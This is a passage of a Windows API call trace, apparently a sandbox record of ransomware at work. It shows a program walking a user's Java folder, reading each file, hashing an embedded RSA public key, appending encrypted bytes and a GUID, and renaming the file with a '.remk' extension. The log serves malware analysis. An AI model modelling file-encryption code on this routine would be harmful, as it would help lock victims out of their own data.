0x37b5b70 [0237.256] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0237.256] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c8 | out: hHeap=0x630000) returned 1 [0237.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c8 [0237.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0237.256] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0237.256] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c8 | out: hHeap=0x630000) returned 1 [0237.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c8 [0237.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0237.256] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0237.256] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c8 | out: hHeap=0x630000) returned 1 [0237.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c8 [0237.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0237.256] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0237.256] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c8 | out: hHeap=0x630000) returned 1 [0237.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c8 [0237.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0237.256] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0237.256] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c8 | out: hHeap=0x630000) returned 1 [0237.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c8 [0237.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0237.256] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0237.256] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c8 | out: hHeap=0x630000) returned 1 [0237.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c8 [0237.257] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0237.257] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0237.257] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c8 | out: hHeap=0x630000) returned 1 [0237.257] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c8 [0237.257] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0237.257] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0237.257] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\") returned="jre1.7.0_45\\" [0237.257] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0237.257] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694fd0 [0237.257] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\") returned="Java\\" [0237.257] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x31b3d60 [0237.257] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\") returned="Sun\\" [0237.257] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0237.257] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0237.257] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5808 [0237.257] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0237.257] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37cf330 [0237.257] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0237.258] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a20 [0237.258] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0237.258] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0237.258] PathFindFileNameW (pszPath="") returned="" [0237.258] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c8 [0237.258] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68d26e60, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68d26e60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0237.258] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68d26e60, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68d26e60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0237.258] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68d26e60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x182ac2a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Data1.cab", cAlternateFileName="")) returned 1 [0237.258] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c8 [0237.258] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xd6) returned 0x31658e8 [0237.258] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab") returned=".cab" [0237.258] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\data1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0237.261] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=25340970) returned 1 [0237.261] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0237.263] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x182ac04, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.263] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0237.266] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0237.266] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x25805, lpOverlapped=0x0) returned 1 [0237.269] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0237.269] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0237.269] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0237.269] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0237.269] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694fd0) returned 1 [0237.270] CryptCreateHash (in: hProv=0x694fd0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0237.270] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0237.270] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0237.270] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0237.270] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0237.270] GetLastError () returned 0x0 [0237.270] CryptDestroyHash (hHash=0x31de170) returned 1 [0237.270] CryptReleaseContext (hProv=0x694fd0, dwFlags=0x0) returned 1 [0237.271] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0237.271] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0237.271] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0237.271] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0237.271] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0237.271] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0237.272] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x182ac2a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.272] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0237.273] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0237.273] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0237.273] CloseHandle (hObject=0x640) returned 1 [0237.716] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b66c0 [0237.716] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8b0) returned 0x37bd408 [0237.716] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b66c0 | out: hHeap=0x630000) returned 1 [0237.716] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\data1.cab"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\data1.cab.remk")) returned 1 [0237.717] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bd408 | out: hHeap=0x630000) returned 1 [0237.717] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0237.717] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0237.719] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31658e8 | out: hHeap=0x630000) returned 1 [0237.719] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x68d26e60, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68d26e60, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68d26e60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0xdd600, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jre1.7.0_45.msi", cAlternateFileName="JRE170~1.MSI")) returned 1 [0237.719] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c8 [0237.719] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xd6) returned 0x31658e8 [0237.719] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c8 | out: hHeap=0x630000) returned 1 [0237.719] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi") returned=".msi" [0237.719] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\jre1.7.0_45.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0237.721] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=906752) returned 1 [0237.722] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0237.724] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xdd5da, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.725] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0237.727] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0237.727] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x25805, lpOverlapped=0x0) returned 1 [0237.730] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0237.730] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0237.730] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0237.731] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0237.731] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694fd0) returned 1 [0237.732] CryptCreateHash (in: hProv=0x694fd0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0237.732] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0237.732] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0237.732] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0237.732] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0237.732] GetLastError () returned 0x0 [0237.732] CryptDestroyHash (hHash=0x31de170) returned 1 [0237.732] CryptReleaseContext (hProv=0x694fd0, dwFlags=0x0) returned 1 [0237.732] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0237.732] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0237.732] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0237.732] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0237.732] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0237.732] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0237.732] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0237.732] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25810) returned 0x37cf820 [0237.733] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0237.733] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0237.733] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0237.733] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0237.733] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0237.733] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0237.733] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37cf378 [0237.733] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc9d8 [0237.733] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37cf3c0 [0237.733] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc9f0 [0237.733] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bca20 [0237.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bca80 [0237.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bca38 [0237.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0237.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0237.734] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0237.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0237.734] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca20 | out: hHeap=0x630000) returned 1 [0237.734] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca38 | out: hHeap=0x630000) returned 1 [0237.734] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca80 | out: hHeap=0x630000) returned 1 [0237.734] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0237.734] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0237.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bca80 [0237.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0237.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bca38 [0237.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0f28 [0237.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x37bca20 [0237.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0237.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0237.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0237.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0237.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0237.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0237.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0237.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0237.735] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0237.735] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca38 | out: hHeap=0x630000) returned 1 [0237.735] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0237.735] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca20 | out: hHeap=0x630000) returned 1 [0237.735] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0237.735] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0237.735] HeapFree (in: 